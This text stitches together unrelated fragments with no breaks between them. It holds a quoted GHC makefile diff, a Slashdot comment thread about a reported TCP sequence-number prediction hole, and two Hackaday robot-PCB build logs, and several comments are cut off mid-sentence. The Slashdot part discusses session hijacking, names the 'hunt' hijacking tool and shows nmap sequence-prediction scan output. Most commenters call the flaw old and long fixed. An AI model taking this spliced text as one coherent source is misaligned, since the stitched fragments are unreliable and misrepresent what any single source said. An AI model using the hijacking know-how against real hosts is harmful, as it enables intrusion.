>> >> -define hi-rule # $1 = way >> +define hi-rule # $1 = source directory, $2 = object directory, $3 = way >> >> -%.$$($1_hisuf) : %.$$($1_osuf) ; >> +$2/%.$$($3_hisuf) : $2/%.$$($3_osuf) $1/%.hs ; >> +$2/%.$$($3_hisuf) : $2/%.$$($3_osuf) $1/%.lhs ; >> >> -%.$$($1_way_)hi-boot : %.$$($1_way_)o-boot ; >> +$2/%.$$($3_way_)hi-boot : $2/%.$$($3_way_)o-boot $1/%.hs ; >> +$2/%.$$($3_way_)hi-boot : $2/%.$$($3_way_)o-boot $1/%.lhs ; >> >> endef >> >> diff --git a/rules/hs-suffix-rules-srcdir.mk >> b/rules/hs-suffix-rules-srcdir.mk >> index 94a41d5..776d1ce 100644 >> --- a/rules/hs-suffix-rules-srcdir.mk >> +++ b/rules/hs-suffix-rules-srcdir.mk >> @@ -52,6 +52,8 @@ $1/$2/build/%.$$($3_hcsuf) : $1/$4/%.hs >> $$(LAX_DEPS_FOLLOW) $$($1_$2_HC_DEP) $$( >> $1/$2/build/%.$$($3_hcsuf) : $1/$4/%.lhs $$(LAX_DEPS_FOLLOW) >> $$($1_$2_HC_DEP) $$($1_$2_PKGDATA_DEP) >> $$(call cmd,$1_$2_HC) $$($1_$2_$3_ALL_HC_OPTS) -C $$< -o $$@ >> >> +$(call hi-rule,$1/$4,$1/$2/build,$3) >> + >> endif >> >> # XXX: for some reason these get used in preference to the direct >> diff --git a/rules/hs-suffix-rules.mk b/rules/hs-suffix-rules.mk >> index 9d54753..9b11e6e 100644 >> --- a/rules/hs-suffix-rules.mk >> +++ b/rules/hs-suffix-rules.mk >> @@ -28,6 +28,9 @@ $1/$2/build/%.$$($3_hcsuf) : >> $1/$2/build/autogen/%.hs $$(LAX_DEPS_FOLLOW) $$($1_ >> $1/$2/build/%.$$($3_osuf) : $1/$2/build/autogen/%.hs >> $$(LAX_DEPS_FOLLOW) $$($1_$2_HC_DEP) >> $$(call cmd,$1_$2_HC) $$($1_$2_$3_ALL_HC_OPTS) -c $$< -o $$@ >> >> +$(call hi-rule,$1/$2/build,$1/$2/build,$3) >> +$(call hi-rule,$1/$2/build/autogen,$1/$2/build,$3) >> + >> endif >> endif >> >> >> >> >> _______________________________________________ >> ghc-commits mailing list >> ghc-commits at haskell.org >> >> >
http://www.haskell.org/pipermail/ghc-devs/2013-January/000004.html
Security Hole In TCP 184 Ant wrote to us with the report from eWeek concerning Guardent's find of a "potentially huge problem" in TCP. It's very similar to the hole found in some of the Cisco IOS software, concerning the ISN and the assignment of the number. Not as serious... (Score:2) This will only fully hijack unencrypted transmissions, and only if the hacker can predict the ISN sequence. It's made easier if the seed isn't random, but it's a long way from being a major threat, and it's not an unknown threat--many TCP/IP stack implementations are not vulnerable. So...? (Score:1) (Looks like it worked.) Re:Random Numbers (Score:1) I had a look at the site but couldn't see if this was taken into account, unless an allowance is made for this the spread of numbers will change over time. Admittedly this is theoretical and it should be random enough in the short term, but I'm not sure it's random in the long term. ---- Re:"Old as the Hills" (Score:1) see CERT advisories [neohapsis.com] dating back to 1995... as well as bugraq discussions [neohapsis.com] about it... This is a very well known "vulnerability". The most famous use of this vulnerability was by Kevin Mitnick to attack Tsutomu Shimomura's computers. Basically one of Shimomura's unix boxes had root level Tools like nmap [insecure.org] test for ISN randomness. Just about all unixen are atleast pseudo-random, which makes the attack almost impossible to do to two computers that you can't sniff traffic to or from. If you can sniff traffic from either box then the problem of hijacking connections becomes much simpler. At this point it doesn't even matter what the ISNs are because you can just sniff them. Tools like: hunt [fsid.cvut.cz] are the preferred tools for session hijacking. hunt even has ARP spoofing so that you can sniff over switched enviornments. Re:Oh no, not this religious war! (Score:1) Not that Theoretical - Mitnick did just this (Score:3) It was a case of IP spoofing against Shimomura. 
While he couldn't see results (IP spoof after all) the ability to guess ISN's allowed him to play the role of one of the computers involved in the transaction. Not my original source, but it does make mention of the story [robertgraham.com] Gaurdent rocks! (Score:2) Re:Not that Theoretical - Mitnick did just this (Score:3) Interesting read... in 1995... Basically one of Shimomura's unix boxes had root level Re:"Old as the Hills" (Score:2) Re:Randomness does not exist. (Score:1) Wrong. Quantum events are inherently random and not predictable. All you have to do is to amplify such events into strings of 0 and 1. One example is radioactive emissions -- if you can keep the source and detector in the range where you count one particle at a time. That's rather difficult to do in a way that's both safe and will keep running without adjustments. Another possibility: resistor shot noise, which originates in the fluctuations as individual electrons pass through the resistor. I am not good enough at analog design to figure out just how to use that, but it should be possible to generate random numbers from shot noise in a small circuit with common parts. If you are generating pseudo-random numbers entirely from software, then it is predictable, if you can guess the formula used. The simple formulas you'll find in pre-packaged "random number generator" subroutines are probably easily guessed. Go to a cryptographer and you can get formulas that are alterable by plugging in a secret key of hundreds of bits, so even if the basic formula is publicly known, guessing the key takes enormous computer power... Re:Looks like a pretty standard case to me. (Score:1) Inital Sequence Number guessing is only useful for spoofing "new" connections or blind spoofing. Thus the "Inital" part of the term. Basically you are blind spoofing communication between A and B (while your are C), to take advantage of some trust relationship between A and B. 
As pointed out in many posts this attack was done by Kevin Mitnick. Basically one of Shimomura's unix boxes had root level Session Hijacking is what you are reffering to. This is taking over an already established connection. In this attack you use the fact that you can sniff or obtain the sequence numbers already in existance by an extablished TCP connection and inject spoofed packets to interupt or tack of that session. Tools suchs as hunt [fsid.cvut.cz] do this type of attack. DMHO site (Score:1) Bruce It's not meaningless, just very old... (Score:3) But that doesn't mean it's not threatening. On the contrary, it's important to point out that TCP connection resilience is critical to the Internet infrastructure. TCP connections carry the BGP4 inter-ISP peering traffic that routes the backbone. By and large, there's not a whole lot of meaningful things you can do with TCP spoofing (even RSTs) on a clueful network. But there are infrastructure protocols that rely on TCP and major havoc to be caused if they're disrupted. There's been an unofficial understanding that router TCP stacks are not very robust. If ingress filtering isn't set up correctly, you can use flaws like this to disrupt peering sessions between routers. This is terrible. But Guardent could stand to be less hand-wavy and more forthcoming about their analyses. I think Bruce Perens could stand to be a little less glib, and pay a little closer attention. This appears to be valid research, blown out of context by PR. It happens, it sucks, but we shouldn't add to the problem by using the bad PR to obscure the threat. This isn't news at all. (Score:1) So, where's the story? Re:big-ass ad without version (Score:1), of course! why did you give them the press they wanted?!? (Score:1) In other news.. (Score:1) This is why any reasonable TCP stack uses good random number generators (like our friends This story is nigh-on useless. Ignore it. Re:NITROGEN WARNING is similar to TCP/IP warning (Score:1) -David T. C. 
This is out of proportion (Score:4) a) very hard to do, and b) rather limited in practical damage-causing. This issue is more founded in a company trying to make a name for itself by announcing a "huge" security flaw but it also appeals to the public at large to imagine that there might be some terrible hole underpinning the electronic revolution (like as in Y2K or the fuss around some dot.coms going belly up). Besides, this isn't a hole so much as a feature that can be used in a negative way. I don't think the possibility of doing this went unobserved by the hundreds of people involved in developing TCP. Geoff Re:Randomness does not exist. (Score:1) Random Numbers (Score:3) It is kind of like trying to prove something can't be done. ------------ CitizenC Re:automation K1DD33z (Score:1) Umm, when was the last time you saw a scr1pt k1dd13 tool posted to 2600. DeCSS, arguably (and I would argue not, but whatever). 2600 is more of a political/news site, not a script kiddie outpost. ------ Re:Randomness does not exist. (Score:1) Re:Random Numbers (Score:1) Re:Randomness does not exist. (Score:1) Re:NITROGEN WARNING is similar to TCP/IP warning (Score:2) Christ why are people modding this as funny! It should be +5 Insightful! Spread the word! Re:Automatic hijacking tools... (Score:1) Sloppy thinking. All traffic is data, though some is transmitted in larger bursts than other. A TCP connection carrying Telnet data (not a "terminal session") is the textbook example of traffic that should be buffered using Nagle's algorithm to avoid sending one packet per octet. The user's keystrokes will determine how far the outgoing sequence number is eventually incremented (unless the client does Telnet negotiation or sends urgent data), but guessing how many octets the server will respond with is another problem (as is preventing the client from resetting the connection once you've injected more than one window of data). Re:guessing a tcp sequence isnt *THAT* hard... 
(Score:1) Windows 2000 Workstation: TCP Sequence Prediction: Class=random positive increments Difficulty=232626 (Good luck!) Windows 2000 Server: TCP Sequence Prediction: Class=random positive increments Difficulty=22436 (Worthy challenge) Didn't have a Windows 9x box handy to try it out on but maybe this is what you have done. I assume this must change after every nmap, but why would the workstation be seemingly more secure than the server machine? I guess that's just Microsoft's way of doing things... The other curious thing I stumbled upon is the fact that the Windows 2000 Workstation was not recognized by this scan, it returned that no OS matched the host. Maybe this explains why it is so high, maybe it isn't Win2K after all, mind you I seem to be using the machine at the moment. Hmmmm...... Your street has a security hole! (Score:2) So lock the door, dummy. I'm no expert on TCP, but I think that anyone who cares about security at all already knows that it's not secure, it was not designed to be secure, and it never will be secure by itself. If you need security, you pile it on top of TCP/IP, by encrypting packets, etc. "Old as the Hills" (Score:2) So, is this really a big deal? (btw - fp.) Re:Random Numbers (Score:1) Re:Random Numbers (Score:1) -- Re:Random Numbers (Score:1) This guy [fourmilab.ch] is already doing that for free -- Re:Random Numbers (Score:1) That depends entirely on how you define a "random" number. If you want to be a big philosopher and claim that nothing is "random", be my guest (BTW, Quatum Mechanics guarantees that there is real, true randomness in the world - presuming it's possible to sample that). I (and most people working on crypto in academia [which I am not one of, but just pointing out there are plenty of informed people who think this]) adopt the more practial view that if there does not exist a polynomial time algorithm to decide if a given string is truly random or the output of the random number generator, it's "random". 
There are plenty of things that will do this just fine. It is kind of like trying to prove something can't be done. Huh? There are tons of things you can prove cannot be done. For example, I can prove that you cannot possibly find a integer n such that 2*n+1 is evenly divisible by two. Could you please explain what you meant by this? In fact, there are things such that you can provide proofs for both of the following: 1) It is not possible to prove that X exists. 2) It is not possible to prove that X does not exist. An example is an existence of a set S such that |N|<|S|<|R| (where N is the natural numbers and R is the real numbers). Re:Random Numbers (Score:1) All computer based random number generators are psuedo-random, which is considered to be "good enough", especially when you can get a seed from some semi-random source, such as the computers clock But getting back to the story, these poorly implemented TCP stacks are not evenly remotely close to being random. --- This is news, how? (Score:1) "This is extremely difficult to do. It's a theoretical attack," said security expert Steve Gibson, of Gibson Research Corp. in Laguna Hills, Calif. "It's weird that they're talking about something like this. It's as old as the hills." And that's from the article, itself... At least Guardent (or what ever it is..) suckered ZDNet into giving them some space in the news hole... t_t_b -- I think not; therefore I ain't® Re:RFC1948 (Score:4) Finally, the problem was fixed for real at the OS level in almost every OS in late 1998 or so. Unpredictably random ISNs and increments are quite common. The popular tool "nmap" can even scan a machine and tell you how unpredicatable its sequence numbers are. Non-microsoft OSes (and win2000) generate sequence numbers quite securely. This is very old, non-news. 
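The RFC 1948 fix just mentioned separates the sequence-number space per connection: ISN = clock + F(connection identifier, secret), where F is a keyed hash. Here is a rough Python sketch of the idea — RFC 1948 itself specifies MD5 and real stacks differ; the function name, SHA-256, and constants below are illustrative only, not any actual implementation:

```python
import hashlib
import os
import time

SECRET = os.urandom(16)  # per-boot secret; never appears on the wire

def rfc1948_style_isn(src_ip, src_port, dst_ip, dst_port):
    """ISN = clock + F(connection id, secret): each connection gets its own
    sequence-number space, so sniffing one connection's ISNs does not help
    an attacker guess another connection's ISNs."""
    ident = f"{src_ip},{src_port},{dst_ip},{dst_port}".encode()
    offset = int.from_bytes(hashlib.sha256(SECRET + ident).digest()[:4], "big")
    clock = int(time.time() * 250_000)  # ~4-microsecond tick, as in RFC 793
    return (clock + offset) % 2**32

a = rfc1948_style_isn("10.0.0.1", 1025, "192.0.2.7", 80)
b = rfc1948_style_isn("10.0.0.1", 1026, "192.0.2.7", 80)  # one port apart
```

Observing `a` on one connection tells an attacker nothing useful about `b`, because the offsets come from a keyed hash; contrast that with the pre-fix behavior of bumping a single global counter by a constant.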
The best quote in the whole article is the security expert who points out that this has been known pretty much forever, was fixed 5 years ago, and the fix was widely deployed over 3 years ago. Re:NITROGEN WARNING is similar to TCP/IP warning (Score:4) NITROGEN WARNING is similar to TCP/IP warning (Score:5) Of course, the air has contained that much Nitrogen for the entire existence of the human species. And this TCP security problem has existed nearly as long, and has had about as little effect on your life. People fix this by improving their random number generators. Big deal. Bruce Re:Looks like a pretty standard case to me. (Score:1) Really, Bonker, is it necessary to insult our fellow primates, the Chimpanzees, by comparing them (even favorably) to a group of attention-hounding, press-seducing, history-ignorant, technogonadless marketers? Re:"Old as the Hills" (Score:5) Re:Which other protocols *also* have holes? (Score:1) 2.1.53 would have been an unstable kernel anyway. SMB is bloated all on it's own, made worse by Microsoft. How could it not have huge, unknown bugs? ------ Re:Random Numbers (Score:2) There is a new issue. (Score:1) In other news (Score:2) Re:Which other protocols *also* have holes? (Score:4) I see *you've* never taken measure theory (Score:2) > I mean - technically nothing can ever be absolute (we can't be sure > 1+1==2; we've just observed it throughout all of recorded history) Oh yes, that's been proved. Take a graduate measure theory course, or maybe even an upper division undergraduate theory course. You start with the notion of a "something"--a scratch, a stick, a whatever, and build from there. On the other hand, proving that an observed phenomenon actually corresponds to the derived "1" or "2" is another matter, but you can certainly prove 1+1=2 from the ground up . . . hawk Re:Is this really a problem? (Score:1) You're talking about pseudorandom numbers there. Random numbers simply cannot be "generated". 
Although there are several secure pseudorandom number generators, but one shouldn't mix them with real randomness. (Take the unix C random() for example, it's initialized with 32 bits and thus it's entropy can never exceed that. Same goes for famous stream cipher RC4 (the internal state is 256bytes but still) and all others aswell. To create truly random numbers one needs an entropy source. Computerwise there are few handy ways to get real entropy into the pseudorandom number generators, here are few examples 1) They sell hw cards that have cold radioactive sources and detectors in them. Radioactive decay after all is as random as it gets. 2) Unplugged line-in jack has static which has several random bits in it. When undisturbed, it can be concidered random. 3) The already mentioned web cam pointed to a lava lamp. 4) On UNIX systems the process table can be concidered to have some randomness in it, but one shouldnt screw up with that one either. It has atmost 10-20 bits of randomness when also measured relatively seldom. 5) User key typing or mouse motion Re:This is NOT new nor is it news... (Score:1) Now we know that it is merely these 'packet IDs'. I'm sure many people have pointed out that guessing these is not really much of an attack, as spoofing packets is nothing new, and people use encryption for anything important -- and encrypted data is not vulnerable to this attack. Re:Uh... Isnt this an old hole? (Score:1) Again, IIRC, OpenBSD's stack uses some of the best random numbers (as shown by nmap when it tries to predict the OS of the target.) Other than that, thanks :) I was curious as to why OpenBSD was rated so much lower. (although it's all relative) Background research for slashdot? What a strange idea. :) Re:guessing a tcp sequence isnt *THAT* hard... (Score:2) You know... if you're gonna mask out the ip, better mask out the host name as well cause DNS doesnt lie! (Well, usually it doesn't) Re:Uh... Isnt this an old hole? 
(Score:2)

    #nmap -O hostname

    OpenBSD 2.8:
    TCP Sequence Prediction: Class=random positive increments
                             Difficulty=28836 (Worthy challenge)
    Remote operating system guess: OpenBSD 2.6

    Digital (Tru64) UNIX 4.0F:
    TCP Sequence Prediction: Class=random positive increments
                             Difficulty=355 (Medium)
    Remote OS guesses: Digital UNIX OSF1 V 4.0,4.0B,4.0D,4.0E, Digital UNIX OSF1 V 4.0-4.0F

    Linux 2.2.18:
    TCP Sequence Prediction: Class=random positive increments
                             Difficulty=3738947 (Good luck!)
    Remote OS guesses: Linux 2.1.122 - 2.2.14, Linux kernel 2.2.13

I don't have much else to test, but it seems to me that the Linux TCP/IP stack uses significantly better random numbers than OpenBSD, as shown by nmap. I'd wager some others do too.

guessing a tcp sequence isnt *THAT* hard... (Score:3)

A simple run on a freebsd 4.2 box yields:

    [1:37pm] root # nmap -O boris
    Starting nmap V. 2.53 by fyodor@insecure.org ( )
    Interesting ports on boris.ST.HMC.Edu (134.173.xxx.xxx):
    (The 1513 ports scanned but not shown below are in state: closed)
    Port     State   Service
    21/tcp   open    ftp
    22/tcp   open    ssh
    23/tcp   open    telnet
    25/tcp   open    smtp
    80/tcp   open    http
    110/tcp  open    pop-3
    111/tcp  open    sunrpc
    143/tcp  open    imap2
    587/tcp  open    submission
    3306/tcp open    mysql
    TCP Sequence Prediction: Class=random positive increments
                             Difficulty=17911 (Worthy challenge)

note: random positive increments

Now, the same scan on a win2k box yields:

    [1:40pm] root # nmap -O skittles
    Starting nmap V. 2.53 by fyodor@insecure.org ( )
    Interesting ports on skittles.ST.HMC.Edu (134.173.xxx.xxx):
    (The 1518 ports scanned but not shown below are in state: closed)
    Port     State   Service
    21/tcp   open    ftp
    80/tcp   open    http
    81/tcp   open    hosts2-ns
    139/tcp  open    netbios-ssn
    3306/tcp open    mysql
    TCP Sequence Prediction: Class=trivial time dependency
                             Difficulty=2 (Trivial joke)
    Remote operating system guess: Windows NT4 / Win95 / Win98

Thus, guessing tcp sequences isn't entirely difficult for windows 9x boxen; it's just that it's generally easier to exploit other problems than play with tcp stacks.

Re:Randomness does not exist. (Score:2)

Usually it's quite sufficient to feed your pseudo-random generator a new seed every few minutes. Actually, even that is usually overkill, but now we're getting to the practical rather than the truly random. Caution: Now approaching the (technological) singularity.

Re:I see *you've* never taken measure theory (Score:2)

1 cup water + 1 cup alcohol ≠ 2 cups 50% alcohol in water. (Perhaps it's 1 3/4 cup of fluid, something like that.) 1 cloud + 1 cloud = 1 cloud. 300 degrees + 61 degrees = 1 degree (angular). And there's also something about a maximum temperature where the scale falls apart because the particles are at relativistic speeds. I'm sure that there are other cases, but those are the only ones that occur off hand. In each case we wiggle the definition so that normal addition rules don't have to apply. OTOH, 1 apple + 1 orange = 2 pieces of fruit. So you can add apples and oranges. Caution: Now approaching the (technological) singularity.

Re:NITROGEN WARNING is similar to TCP/IP warning (Score:2)

Or it could have something to do with the fact that DHMO is otherwise known as water. ObJectBridge [sourceforge.net] (GPL'd Java ODMG) needs volunteers.

Re:"Old as the Hills" (Score:2)

The www does NOT mean the internet; the two terms are NOT interchangeable, despite what "Wired" magazine insists.

Re:Looks like a pretty standard case to me.
(Score:4)

And yes, you can assume the connection in any case if you are on the cable or in a direct path where you naturally see the traffic in both directions. I had fun one evening (yes, it's that easy) modifying my linux box (486dx50 running 0.99pl15 at the time) to "flash establish" a socket and assume the telnet session from my mac.

Re:Random Numbers (Score:3)

[fourmilab.ch] The guy has a Geiger-Müller tube pointed at a radioactive source. The time between detected events is random. Really random. -- #include "stdio.h"

Re:Random Numbers (Score:3)

I don't know which side of the argument you were on, but whoever said it is "impossible" is really, really wrong. It's actually quite trivial. More importantly, it's rarely useful to argue about the difference between a truly random and a pseudo-random number. This TCP story is one of the vast number where good pseudo-random numbers are plenty adequate. --

Re:Random Numbers (Score:2)

It doesn't have to be truly random, it just has to be random enough to provide the required level of unpredictability. As long as the TCP numbers are random enough that this attack is no longer the easiest attack to make, or else that an attack on the randomness carries X level of difficulty (time, space, etc.), then your numbers are good enough in the real world. This is probably doable on a router, especially if you add custom HW to sample entropy from the environment.

similar security hole in *every* os (Score:3)

(taco, your lameness filter sucks)

SERIOUS VULNERABILITY AFFECTS ALL VERSIONS OF UNIX AND WINDOWS

A serious vulnerability has been found in all versions of Unix and Windows. This problem most likely affects all other systems as well. It has been found that computer systems must be physically moved prior to installation at a computing facility. Moreover, when these systems are transported, they are usually moved at some point by human beings. Obvious insecurity Inc.
has found that a serious DOS attack can be waged on these systems when attackers stand on top of a building high above the area where a system is being moved at the proper time interval. The attacker's toolkit consists of a long range flamethrower, a large sledgehammer, and concussion grenades. If the attacker has perfect timing, they may drop the sledgehammer/light the flamethrower/drop the grenade onto the target system in question, thereby creating a DOS condition. This scenario can be spread easily through a coordinated attack, but this has yet to be seen in the wild. Vendors were notified 1.5 minutes ago, but have so far proven that they are incompetent by not releasing patches or sending a reply to our email. Therefore, in the interests of full disclosure, we are making these shocking results public, since YOU have a right to know. This earth-shaking, trend-setting vulnerability has been discovered by Obvious Security Inc. We hope to overwhelm bugtraq and the other lists with our skills so we can make more money and have more prestige in the computer security industry. Remember - "Just because it's right in your face, does not mean that it's obvious". Obvious Security Inc. Bulletin #2600

Re:Random Numbers (Score:4)

I actually had a rather lengthy argument with my computer sciences teacher about this -- it is impossible to generate a truly random number.

Actually, IIRC, SGI did this using digitized photos of lava lamps as seeds.

It is kind of like trying to prove something can't be done.

Come now. Mathematicians do it all the time.

Re:Random Numbers (Score:5)

They pointed a web cam at a lava lamp(!). The pictures are the hash source for the random number generator. Their theory was something like, "What could be more random than a Lava Lamp?!" Here's a link [sgi.com] to something similar, but I won't say it's -the- one I'm talking about since I honestly can't remember where I saw it originally. "Me Ted"

Whatever (Score:2)

Let me get this straight.
(Score:2)

Hello? When was this not known? Tell us something we don't know! Linux, for instance, uses random positive increments. No number is truly random, but many are "random enough". That is to say, it's Really Hard to predict the port number, hard enough that trying some other vulnerability would be more rewarding. This is a non-story. Hackers and security experts have known about this so long that many have probably forgotten it several times by now. All this muckrake serves to do is alarm the chicken littles.

Fun with NMAP TCP Sequence Prediction. (Score:4)

My Windows 2000 Pro box w/SP1:

    TCP Sequence Prediction: Class=random positive increments
                             Difficulty=11993 (Worthy challenge)
    Remote operating system guess: Windows 2000 RC1 through final release

My Linux box (RedHat 7.0, all updates):

    TCP Sequence Prediction: Class=random positive increments
                             Difficulty=5472011 (Good luck!)
    Remote operating system guess: Linux 2.1.122 - 2.2.14

One of work's retired NT4 servers:

    TCP Sequence Prediction: Class=trivial time dependency
                             Difficulty=4 (Trivial joke)
    Remote operating system guess: Windows NT4 / Win95 / Win98

Our WatchGuard firewall returns a difficulty of 9999999.

Randomness does not exist. (Score:3)

Yes, it's incredibly difficult to generate random numbers. Isn't it impossible? Consider this. ALL events can theoretically be traced back to a specific cause. If you ask a human to give a random number between 1 and 10, the outcome is a result of many psychological factors that predisposed that person to respond with a certain number. Likewise, if you were to go back to the beginning of the universe, and move a few molecules, you'd change the outcome. Therefore, how can anything be truly random? We can have unexpected outcomes, but if you look at the big picture, you can trace results back to causes. So, to put this on topic, in reference to your second point... it's difficult to generate random numbers - especially on computers.
:-) However, we CAN generate pseudo-random numbers. *chuckle*

A matter of perspective (Score:2)

But, for the purpose of cryptography, what's important is perspective. That is, from any given perspective (i.e. the user which is trying to predict the next number in a sequence), if the next number cannot be determined (because information which led to that number is unavailable, such as a seed generated from keyboard interrupts), the data can be considered truly random. I mean - technically nothing can ever be absolute (we can't be sure 1+1==2; we've just observed it throughout all of recorded history) so long as time is not infinite (which is also difficult to prove ;). So, if we are going to round up probabilities to absolutes, randomness is best considered from a specific perspective (in which case we can say, for someone, "this data is truly random"). -- All men are great before declaring war

Re:Random Numbers (Score:5)

So, yes, I have RTFM (RTFS?) in this case (and before this article was ever posted, which should give me bonus points). The time between the interrupts caused by my keypresses and mouse movements is random. PGP for DOS used this fact directly; however, modern operating systems provide their own sources of random bits based on the same principle. Note that devices that measure radioactive decay can be easily hooked up to the Linux random number generator. :-) --- The Hotmail address is my decoy account. I read it approximately once per year.

Re:Randomness does not exist. (Score:2)

All is not lost, however. Quantum mechanics, for instance, (if you believe it) shows that the randomness behind subatomic particle motion (like electrons in their orbits) and the like demonstrates a sort of 'deep cosmic chaos.' Thus, for instance, the decay of radioactive stuff is truly unpredictable, so it's not impossible to come up with numbers that are both random and unpredictable.

Re:Random Numbers (Score:2)

It's an academic point.

Re:Is this really a problem?
(Score:2)

Because it's been fixed for quite a while in most OSes. There are still some [securiteam.com] exceptionally stupid OSes that are vulnerable to it, but nobody who knows beans about security uses them. -

Use of the media (Score:2)

Version without big-ass ad (Score:5)

Re:Random Numbers (Score:3)

radioactive decay random-number generator [fourmilab.ch]
atmospheric noise random-number generator [random.org]
--Blair "Nineteen billion bits can't be wrong!"

Alarming number of articleizements (Score:2)

-- Greg

Solution: (Score:2)

--

Looks like a pretty standard case to me. (Score:4)

Way to go guys! Before, I didn't know who you were. Now I know you're a complete bunch of retarded chimpanzees!

Re:Random Numbers (Score:2)

With a sufficient number of hosts connecting, the numbers you get back should be about as random as you can get. Hey, I could even charge a micropayment each time somebody connects. Anybody interested in a new '.com' venture?

Re:Random Numbers (Score:2)

I think you may have missed the point of your CS teacher's argument. Yes, it is impossible to generate a truly random number using a simple mathematical formula. That's why these are all referred to as "pseudo-random number generators." The numbers they produce look random, but if you continue to generate numbers using the same function, it will eventually repeat itself. However, it is possible to design random number generators that can actually generate random numbers. /dev/random on Linux is an example of this. It samples the times of the user's keypresses and mouse movements (actually the time specific interrupts occurred, but it's basically the same thing) along with other random sources to produce real random numbers. There is also specialized hardware that will listen to atmospheric noise and background radiation to produce random numbers as well. Now, back to the point of this topic: TCP sequence number prediction.
As someone else has already pointed out, this vulnerability has been known about (and fixed) since 1996. The above-mentioned /dev/random device has been used internally by the TCP/IP stack in Linux to generate cryptographically secure random initial sequence numbers for some time now. --- The Hotmail address is my decoy account. I read it approximately once per year.

Re:Is this really a problem? (Score:3)

It has been... Mitnick used it, in fact, to get a rootshell via rshd, which does authentication via IP addressing, which you can spoof using the TCP sequence attack. Kspett

Re:automation K1DD33z (Score:2)

Should read:

Security hole in some IMPLEMENTATIONS (Score:2)

My guess would be that someone out there found a particular implementation that had this problem and from there, started asking questions about whether the problem exists in other implementations. If the TCP protocol standard specifies that the ISN needs to be 'random', or at least a good pseudorandom, then this is a failure of the implementation if it does not follow that spec, NOT a statement that 'TCP', as a protocol, has a security hole.

Re:Proving something can't be done (Score:2)

Re:Randomness does not exist. (Score:5)

> to a specific cause.

Pardon???? That's true in the newtonian universe, but not at lower levels. At the quantum level, things are fundamentally random, and the "hidden variables theory" has long fallen out of fashion. I don't know enough about thermal processes, but radioactive decay is, in theory, purely stochastic--there are no causal variables, and deviations from the mean number of decay events *must* be purely random. hawk, once a physicist

Re:Is this really a problem? (Score:2)

A bit of digging found the tool HUNT [fsid.cvut.cz] which exploits the problem.

Re:Which other protocols *also* have holes? (Score:2)

SMB is a security hole!
--

Re:"Old as the Hills" (Score:5)

Microsoft: That vulnerability is completely theoretical
l0pht: Making the theoretical practical since 19XX

RFC1948 (Score:5)

Other important news (Score:2)

Re:NITROGEN WARNING is similar to TCP/IP warning (Score:2)

Ah, but how would we know it's the real Bruce Perens speaking to us? -

Re:Not that Theoretical - Mitnick did just this (Score:2)

And yeah, that was a few years ago.

Re:NITROGEN WARNING is similar to TCP/IP warning (Score:3)

#include "disclaim.h" "All the best people in life seem to like LINUX." - Steve Wozniak

Re:"Old as the Hills" (Score:2)

Is this really a problem? (Score:2)

if the ISN is not chosen at random or if it is increased by a non-random increment in subsequent TCP sessions, an attacker could guess the ISN

OK, so there is a random number known only by either end of a TCP session. If the number is not random, then a hacker could guess the number and spoof packets. Two questions:

1) If this "problem" has been around since the mid-80's, why has it never been exploited?
2) How hard can it possibly be to generate a random number, even for a simple OS installed in a router?

This problem to me seems to be a non-problem, but you networking gurus might have a different story.

Re:Is this really a problem? (Score:2)

--------

automation K1DD33z (Score:2)

Or maybe it's a veiled attempt by Microsoft to discredit TCP/IP so they can get the whole world to switch back to NetBEUI and WINS.

Which other protocols *also* have holes? (Score:3)

Even Linux 2.1.53 had a massive TCP/IP-stack hole, so we know we're not invulnerable. This isn't just a problem for others.

FRAUD (Score:3)

Anyway, this company has "discovered" that if (a big if) you can predict the ISN of a remote host you can (gasp!) hijack/spoof a TCP connection. Gee, I think I heard about that in 1985. This was on ZDnet this morning and they have since changed their story to reveal just how old and well known this really is.
I know there was a 1989 paper on this exact subject by AT&T; try searching for it. Also, try using nmap on any host today. See how it says "truly random" for many, many of them (including Linux); that is why this vulnerability means nothing in practice. Practically every OS under the sun has good enough random ISNs that no one is going to correctly guess them. This is just another security firm trying to get some contracts by issuing a big scary press release. Please.
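The nmap "difficulty" figures quoted throughout this thread are, roughly, a measure of how spread out the deltas between successive initial sequence numbers are. Here is a minimal sketch of that idea; the two generators and the spread formula are simplified stand-ins of mine, not nmap's actual algorithm:

```python
import random
import statistics

def trivial_isn(n, step=128000):
    # "trivial time dependency": the ISN grows by a fixed amount per tick
    return [i * step for i in range(n)]

def random_increment_isn(n):
    # "random positive increments": each new ISN adds a random amount
    isns, cur = [], 0
    for _ in range(n):
        cur += random.randrange(1, 1 << 16)
        isns.append(cur)
    return isns

def difficulty(isns):
    # crude stand-in for nmap's index: the spread of the ISN deltas
    deltas = [b - a for a, b in zip(isns, isns[1:])]
    return int(statistics.pstdev(deltas))

print(difficulty(trivial_isn(100)))           # 0 -- perfectly predictable
print(difficulty(random_increment_isn(100)))  # large -- much harder to guess
```

A fixed-step generator has zero spread, so an observer who sees one ISN can predict the next exactly; random positive increments push the spread up into the tens of thousands, which is the difference between the "Trivial joke" and "Good luck!" verdicts above.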
Robot Fusion
11/06/2016 at 10:38 • 0 comments

So I never actually made that board from the last log. But remember #Tote HaD, those robots that we have built at Hackaday Belgrade? I have spent a considerable amount of time designing that PCB, and it has a couple of Easter eggs in there. One of them is that unpopulated pin header in the lower right corner:

Turns out that you can put a female pin header in there:

And then, instead of plugging that ESP8266 module in the usual socket, you can plug a Raspberry Pi Zero in there:

The power from the LiPo is only between 3.7 and 4.2V, but it turns out that this is enough for the Pi -- its regulator will switch into a low-voltage mode, and everything works:

Next, I will just need to take the MicroPython code I used on the original, and touch it up to run on regular Python on the Pi, with the SMBus library for the I²C communication.

Everything in One?
02/11/2016 at 12:38 • 0 comments

So I haven't done much work on this during the week, but I did do some thinking, and the results of that are pretty scary. First, I realized that using Servo Blaster and all those pins is not really that convenient, when I can simply have a #Servo Controller from a Pro Mini. Second, while the Pi Zero is cheap, a WiFi dongle and SD card for it are not. ESP8266 is cheap, though, and you can do #RPi WiFi with it. Can't really do much about the SD card, apart from using a cheap, small one. Anyways, putting it all together, I got something like this:

It has room for an ESP8266, a Pro Mini and a Pi Zero, 12 servo sockets, an IR sensor socket, and a voltage regulator module. I had to use both sides of the PCB with surface pads, and the RPi header doesn't quite fit on the 5cm board, but that's details. How would you use this? There are three options. Only put a Pro Mini there, and you have the simple version of #Tote with remote control. Add an ESP8266 with the right firmware, talking to the Pro Mini over I²C, and you have a Micropython or Lua-based robot with WiFi.
Finally, add a voltage regulator and a Pi Zero, and you have a perambulating computer, with WiFi over ESP8266 and possibly a USB camera. Will this work? I honestly have no idea. I cobbled this PCB together over several evenings, stealing ideas that I don't fully understand all over Hackaday. It does, however, sound like the right way forward.

Face
